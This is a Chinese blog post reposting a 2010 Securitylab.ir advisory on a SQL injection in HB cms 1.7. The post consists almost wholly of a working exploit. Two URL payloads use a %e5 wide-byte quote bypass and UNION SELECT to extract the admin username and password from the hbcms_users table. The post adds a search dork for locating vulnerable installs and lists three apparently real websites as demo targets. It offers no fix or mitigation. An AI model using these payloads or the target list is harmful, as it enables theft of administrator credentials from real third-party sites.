HBcms 1.7 “article_id” SQL 注入漏洞

Posted on 2010-05-22 by tunpishuang

来自http://tunps.com/hbcms-article_id-sql-injection-vulnerability

########################## Securitylab.ir ########################
# Application Info:
# Name: HB cms
# Version: 1.7
# Website: http://www.hbcms.com
#################################################################
# Discoverd By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir
#################################################################
# Vulnerability Info:
# Type: Sql Injection
# Risk: Medium
# Dork: inurl:/hbcms/php/
# magic_quotes_gpc = On� /\� register_globals = Off
#===========================================================

# User:
# http://site.com/[path]/php/update_article_hits.php?show_hits=yes&article_id=-1%e5" union select login_name from hbcms_users where id=1%23
#
# Pass:
# http://site.com/[path]/php/update_article_hits.php?show_hits=yes&article_id=-1%e5" union select login_pass from hbcms_users where id=1%23
#
# Demo:
# http://www.aolinivt.com/hbcms
# http://www1.bonetumor.cc/hbcms
# http://beauty-f.com/ps/hbcms
#===========================================================
#################################################################
# Securitylab Security Research Team
###################################################################

About tunpishuang

just 4 fun·····
This entry was posted in 未分类 and tagged , , . Bookmark the permalink.

发表评论

电子邮件地址不会被公开。 必填项已用 * 标注

*

您可以使用这些 HTML 标签和属性: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>